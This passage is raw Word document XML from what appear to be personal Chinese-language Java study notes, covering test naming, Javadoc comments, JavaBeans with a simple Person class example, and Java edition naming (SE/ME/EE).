          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test&lt;MethodUnderTest&gt;_&lt;state&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> testPop_emptyStack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4823AE42" w14:textId="10C22119" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="027C7A34" w14:textId="07F68118" w:rsidR="004C29F5" w:rsidRDefault="004C29F5" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="722" w:name="_Toc159780151"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档注释</w:t>
      </w:r>
      <w:bookmarkEnd w:id="722"/>
    </w:p>
    <w:p w14:paraId="59A473A0" w14:textId="3BF70C88" w:rsidR="004C29F5" w:rsidRDefault="004C29F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C29AF26" w14:textId="77777777" w:rsidR="004C29F5" w:rsidRDefault="004C29F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持三种注释方式。前两种分别是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> /* */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，第三种被称作说明注释，它以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE1877">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始，以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE1877">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结束。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76313126" w14:textId="77777777" w:rsidR="004C29F5" w:rsidRDefault="004C29F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="583771AB" w14:textId="77777777" w:rsidR="004C29F5" w:rsidRDefault="004C29F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明注释允许你在程序中嵌入关于程序的信息。你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> javadoc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具软件来生成信息，并输出到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6210987E" w14:textId="77777777" w:rsidR="004C29F5" w:rsidRDefault="004C29F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA885CA" w14:textId="31B6FEC7" w:rsidR="004C29F5" w:rsidRDefault="004C29F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明注释，使你更加方便的记录你的程序信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16259CA4" w14:textId="77777777" w:rsidR="004C29F5" w:rsidRDefault="004C29F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27EFE165" w14:textId="74A9F894" w:rsidR="004C29F5" w:rsidRDefault="00633D15" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="723" w:name="_Toc159780152"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JavaBean</w:t>
      </w:r>
      <w:bookmarkEnd w:id="723"/>
    </w:p>
    <w:p w14:paraId="7371EEDE" w14:textId="77777777" w:rsidR="00633D15" w:rsidRDefault="00633D15" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A7DA31E" w14:textId="62C14FF6" w:rsidR="00633D15" w:rsidRDefault="00A632BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C596B" w:rsidRPr="001C596B">
        <w:t>https://www.liaoxuefeng.com/wiki/1252599548343744/1260474416351680</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110A6AFF" w14:textId="77777777" w:rsidR="00633D15" w:rsidRDefault="00633D15" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6795F9AD" w14:textId="7D1331B0" w:rsidR="00633D15" w:rsidRDefault="00982D09" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最开始是分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fastjson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候看到这么一句话</w:t>
      </w:r>
      <w:r w:rsidR="000E0A27">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0139DC" w14:textId="77777777" w:rsidR="00D03ADC" w:rsidRDefault="00D03ADC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BD885ED" w14:textId="3E8E6670" w:rsidR="005F4715" w:rsidRPr="005F4715" w:rsidRDefault="005F4715" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F4715">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fastjson</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4715">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的作用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C96AF8A" w14:textId="77777777" w:rsidR="005F4715" w:rsidRPr="005F4715" w:rsidRDefault="005F4715" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F4715">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4715">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>javabean</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4715">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>序列化为</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4715">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4715">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>格式的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B4F178" w14:textId="2BD8FDD4" w:rsidR="00D03ADC" w:rsidRDefault="005F4715" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005F4715">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4715">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4715">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>格式的字符串，反序列化为</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4715">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>javabean</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4715">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7211BE46" w14:textId="77777777" w:rsidR="00D03ADC" w:rsidRDefault="00D03ADC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B27ABD" w14:textId="693087D0" w:rsidR="00D03ADC" w:rsidRDefault="0098343D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:t>bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fastjson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的底层逻辑</w:t>
      </w:r>
      <w:r w:rsidR="00EE6B17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，序列化和反序列化，操作的是</w:t>
      </w:r>
      <w:r w:rsidR="00EE6B17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidR="00EE6B17">
        <w:t>Bean</w:t>
      </w:r>
      <w:r w:rsidR="00EE6B17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00EE6B17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r w:rsidR="00EE6B17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串两者而已</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6C5F29" w14:textId="77777777" w:rsidR="0098343D" w:rsidRPr="00EE6B17" w:rsidRDefault="0098343D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="036FAA4A" w14:textId="19B56B7B" w:rsidR="0098343D" w:rsidRDefault="00836290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单总结</w:t>
      </w:r>
      <w:r w:rsidR="00BA6147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javabean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，就是定义成员变量，然后定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t>, getter, setter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AA0E6D" w14:textId="77777777" w:rsidR="0098343D" w:rsidRDefault="0098343D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="568A6454" w14:textId="77777777" w:rsidR="00836290" w:rsidRDefault="00836290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1637C64E" w14:textId="77777777" w:rsidR="00836290" w:rsidRDefault="00836290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    private String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BF655D" w14:textId="77777777" w:rsidR="00836290" w:rsidRDefault="00836290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    private int age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA0A87A" w14:textId="77777777" w:rsidR="00836290" w:rsidRDefault="00836290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476C4EB9" w14:textId="77777777" w:rsidR="00836290" w:rsidRDefault="00836290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public String getName() { return this.name; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2114F988" w14:textId="77777777" w:rsidR="00836290" w:rsidRDefault="00836290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public void setName(String name) { this.name = name; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB5A694" w14:textId="77777777" w:rsidR="00836290" w:rsidRDefault="00836290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC4633E" w14:textId="77777777" w:rsidR="00836290" w:rsidRDefault="00836290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public int getAge() { return this.age; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C201571" w14:textId="77777777" w:rsidR="00836290" w:rsidRDefault="00836290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public void setAge(int age) { this.age = age; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E37AAD" w14:textId="77777777" w:rsidR="00836290" w:rsidRDefault="00836290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02E60489" w14:textId="77777777" w:rsidR="00836290" w:rsidRDefault="00836290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public boolean isChild() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D48AC66" w14:textId="77777777" w:rsidR="00836290" w:rsidRDefault="00836290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return age &lt;= 6;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780A9A79" w14:textId="77777777" w:rsidR="00836290" w:rsidRDefault="00836290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1A9BFD" w14:textId="49D5077F" w:rsidR="00633D15" w:rsidRPr="00633D15" w:rsidRDefault="00836290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C187D4" w14:textId="77777777" w:rsidR="004C29F5" w:rsidRDefault="004C29F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE10294" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="724" w:name="_Toc159780153"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本命名问题</w:t>
      </w:r>
      <w:bookmarkEnd w:id="724"/>
    </w:p>
    <w:p w14:paraId="222CB11F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:hyperlink r:id="rId219" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/krismile__qh/article/details/98884337</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2793C56F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/sinat_33921105/article/details/117513645</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B09FEA0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="797A2F04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有三个版本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6AA60F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JavaSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java Platform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Standard Edition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准版</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19718629" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JavaME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java Platform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Micro Edition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>微型版</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33349E46" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JavaEE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java Platform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Enterprise Edition) JAVA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>企业版</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A8B2EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只要关注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JavaSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就行，这个是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的标准版本，像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>忽视就行，至于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JavaEE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JavaSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的基础上升级而来的一套规范，我们平常做</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发，你想下，是不是就是需要个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JavaSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相对应的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E52396" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F930424" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1996</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年发布了最初版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java1.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
